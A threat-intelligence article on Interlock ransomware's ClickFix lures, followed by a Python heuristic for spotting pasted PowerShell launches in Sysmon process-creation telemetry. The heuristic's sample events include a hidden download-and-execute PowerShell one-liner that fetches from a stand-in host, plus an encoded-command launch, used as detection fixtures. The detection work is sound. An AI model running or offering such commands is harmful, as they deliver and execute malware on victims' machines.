Interlock Ransomware Utilizes ClickFix Method to Execute Harmful Commands on Windows Systems
The cybersecurity landscape continues to evolve as threat actors develop increasingly sophisticated methods to compromise Windows systems. A new ransomware variant known as Interlock has emerged as a significant threat, leveraging the deceptive ClickFix social engineering technique to execute malicious commands on victim machines. The malware represents a concerning evolution in ransomware deployment tactics, combining traditional phishing approaches with a multi-stage payload delivery mechanism.

Interlock ransomware has actively targeted organisations across North America and Europe since September 2024, with a clear financial motivation expressed through its double extortion methodology. The threat group behind the malware has shown remarkable persistence and technical sophistication, employing a complex attack chain that begins with compromised websites and culminates in full system compromise. The malware’s ability to fingerprint victim systems and prioritise high-value targets indicates a well-resourced operation with strategic objectives.
In July 2025, eSentire analysts identified multiple sophisticated incidents attributed to the Interlock Group, revealing the ransomware’s evolving capabilities and attack methodologies. The researchers found that the threat actors had developed a multi-layered approach involving PowerShell scripts, PHP backdoors, and custom-built remote access tools. This analysis has provided crucial insight into the malware’s tactics, techniques, and procedures, offering the cybersecurity community valuable intelligence for defensive measures.

The attack begins when victims unknowingly visit compromised websites, particularly those infected through the KongTuke compromise chain, which redirect users to malicious ClickFix pages. ClickFix is a social engineering technique that deceives victims into executing harmful commands by presenting fake error messages or system notifications that appear legitimate. Upon interacting with these deceptive elements, victims are prompted to copy and execute PowerShell commands that appear to resolve fictitious technical issues.
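Because ClickFix relies on the victim pasting the command rather than on an exploit, the resulting PowerShell launch leaves a distinctive process-creation signature that defenders can hunt for. The following Python heuristic is an added example, not code from the article or from eSentire's research: it scores Sysmon-style process-creation events for that pattern, and the indicator lists, the interactive-parent assumption and the sample events are all constructed assumptions rather than Interlock telemetry.

```python
"""Heuristic for ClickFix-style PowerShell launches in process-creation telemetry.

A ClickFix lure has the user paste a command into the Run dialog, so powershell.exe
appears as a child of explorer.exe with a command line combining a download cradle,
an execute-from-string step and window-hiding switches. Field names follow Sysmon
Event ID 1; indicator lists and sample events are constructed assumptions.
"""
import re

# Command-line traits typical of pasted one-liners (assumed indicators).
CRADLE = re.compile(r"\b(iwr|invoke-webrequest|irm|invoke-restmethod|downloadstring|curl)\b", re.I)
EXEC = re.compile(r"\b(iex|invoke-expression)\b|-e(c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}", re.I)
STEALTH = re.compile(r"-w(indowstyle)?\s+h(idden)?\b|-nop(rofile)?\b|-e(xecutionpolicy|xec|p)\s+bypass", re.I)
INTERACTIVE_PARENTS = {"explorer.exe"}  # parent when a user types or pastes the command

def score_event(ev: dict) -> list:
    """Return the reasons an event looks like ClickFix execution; [] means benign."""
    image = ev.get("Image", "").rsplit("\\", 1)[-1].lower()
    if image not in {"powershell.exe", "pwsh.exe"}:
        return []
    parent = ev.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    cmd = ev.get("CommandLine", "")
    reasons = []
    if parent in INTERACTIVE_PARENTS:
        reasons.append(f"launched from {parent} (user-pasted command)")
    if CRADLE.search(cmd):
        reasons.append("downloads remote content")
    if EXEC.search(cmd):
        reasons.append("executes downloaded or encoded content")
    if STEALTH.search(cmd):
        reasons.append("hides window / bypasses execution policy")
    # Interactive parent plus two command-line traits; a scheduled admin script is not flagged.
    return reasons if parent in INTERACTIVE_PARENTS and len(reasons) >= 3 else []

def detect(events: list) -> list:
    """Return (command line, reasons) for every event that score_event flags."""
    return [(ev["CommandLine"], r) for ev in events if (r := score_event(ev))]

# Constructed sample events (flattened Sysmon Event ID 1 fields), not real telemetry.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": r'powershell -w hidden -nop -c "iwr http://lure.example.invalid/fix.txt | iex"'},
    {"ParentImage": r"C:\Windows\System32\svchost.exe", "Image": PS,
     "CommandLine": r"powershell -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS, "CommandLine": "powershell"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": "powershell -nop -w hidden -e QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVo="},
]
```

Only the first and last sample events are flagged: the scheduled script with a policy bypass has a non-interactive parent, and a user simply opening a console carries none of the command-line traits.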